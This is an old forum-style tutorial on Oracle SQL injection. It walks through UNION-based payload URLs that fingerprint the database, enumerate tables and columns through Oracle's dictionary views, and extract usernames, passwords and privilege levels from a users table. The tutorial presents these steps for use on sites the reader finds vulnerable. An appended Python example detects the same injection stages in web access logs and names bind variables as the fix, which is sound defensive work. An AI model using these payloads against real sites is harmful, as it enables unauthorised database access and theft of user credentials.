Enigma Group's Articles
Oracle SQL Injection Tutorial. - Submitted By: t3hmadhatt3r 2009-05-19 21:01:34
Hello and welcome to an Oracle SQL injection tutorial. First you need to know that injecting into Oracle databases is not much different than injecting into others. The only differences are the syntax, different filenames, etc.

OK, if you know a site that is vulnerable to some sort of SQLi but you don't know what database it is, try the following code to check for an Oracle DB.

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL%20from%20dual--

If it is an Oracle DB you should get an error like:

Code:
[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result columns

Now, to find the number of columns the original query returns, keep adding NULL values until you no longer receive an error.

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,NULL,NULL,NULL%20from%20dual--

Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info, but other info can be extracted as well.

Now we try to find which columns use a "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error, replace the 'a' with NULL and try the next "NULL". An example of this is:

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,'a','a',NULL%20from%20dual--

Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table. We also use its "object_name" and "object_type" columns to list the names and types of the objects that hold user data (credentials). An example would look like so:

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,object_name,object_type,NULL%20from%20user_objects--

As you can see, we use the columns that use string data to show object_name and object_type.

Tip: You can also use the all_user_objects table instead of user_objects.
This will show all info seen by the user even if the user does not own it.

We should now see many different table names and types. If you don't, and you get an error, try removing NULL values and finding the columns that use a string data type.

In my example let's just say we found a table called USERS. We will attempt to find the names of the columns inside this table by using the user_tab_columns table like so:

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%3d%20'USERS'--

Note: %3d is a URL-encoded = and %20 is a URL-encoded whitespace (spacebar).

Now let's say we get login, password, and priviledge columns. We can query these by using the following code:

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,login,password,priviledge%20from%20users--

You should get the login username, password, and privilege level!

Tip: If there is only one column that uses a string data type then you can concatenate multiple columns like so:

Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,login||':'||password||':'||priviledge,NULL,NULL%20from%20users--

This is just like the concat command in MySQL.

Tip: If you want to perfect your Oracle injection knowledge I recommend getting some e-books on Oracle and installing Oracle on your localhost. This way you can practice on your own DB.

Hope you enjoyed the tutorial. Please leave feedback and suggestions for future tutorials. Thanks for reading.
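Seen from the server side, each step of the walkthrough above leaves a recognisable request in the web access log. The Python below is an added example, not part of the original tutorial: it decodes each query parameter, labels the request with the step it matches, and lists clients whose enumeration or extraction requests came back with HTTP 200. The log lines, the stage names and the use of the status code as a success signal are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

REQ_RE = re.compile(
    r'(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
UNION_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\b(?P<cols>.*?)\bfrom\s+(?P<src>[\w$#.]+)", re.I | re.S)
DICT_RE = re.compile(r"(?:user|all|dba)_\w+", re.I)  # Oracle data-dictionary view prefixes

def normalize(value, rounds=2):
    """Undo nested percent-encoding (%2520 -> %20 -> space), collapse whitespace."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return re.sub(r"\s+", " ", value)

def classify(value):
    """Map one query-parameter value to the stage it matches, or None if benign."""
    m = UNION_RE.search(normalize(value))
    if not m:
        return None
    src = m.group("src").lower()
    cols = [c.strip().lower() for c in m.group("cols").split(",")]
    if src == "dual":  # nothing real is read yet: the query shape is being probed
        return "column-count probe" if all(c == "null" for c in cols) else "type probe"
    return "dictionary enumeration" if DICT_RE.fullmatch(src) else "data extraction"

def scan(lines):
    """Return (client, parameter, stage, http_status) for every flagged request."""
    findings = []
    for m in filter(None, map(REQ_RE.match, lines)):
        for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            stage = classify(value)
            if stage:
                findings.append((m["client"], name, stage, int(m["status"])))
    return findings

def escalate(findings):
    """Clients that got a 200 on enumeration or extraction: the injection likely worked."""
    hot = {"dictionary enumeration", "data extraction"}
    return sorted({c for c, _, stage, status in findings if stage in hot and status == 200})

SAMPLE_LOG = [  # constructed lines in common log format, not real traffic
    '203.0.113.9 - - [19/May/2009:21:00:02 +0000] "GET /calender.asp?day=7 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [19/May/2009:21:01:34 +0000] "GET /calender.asp?day=7%20UNION%20SELECT%20NULL%20from%20dual-- HTTP/1.1" 500 312',
    '198.51.100.7 - - [19/May/2009:21:01:40 +0000] "GET /calender.asp?day=7%20UNION%20SELECT%20NULL,%27a%27,%27a%27,NULL%20from%20dual-- HTTP/1.1" 200 5188',
    '198.51.100.7 - - [19/May/2009:21:01:52 +0000] "GET /calender.asp?day=7%2520UNION%2520SELECT%2520NULL,object_name,object_type,NULL%2520from%2520user_objects-- HTTP/1.1" 200 9102',
    '198.51.100.7 - - [19/May/2009:21:02:10 +0000] "GET /calender.asp?day=7%20UNION%20SELECT%20NULL,login,password,priviledge%20from%20users-- HTTP/1.1" 200 7001',
]
```

Calling `escalate(scan(SAMPLE_LOG))` returns the clients to triage first. The underlying fix remains validating `day` as an integer and passing it to the query as a bind variable.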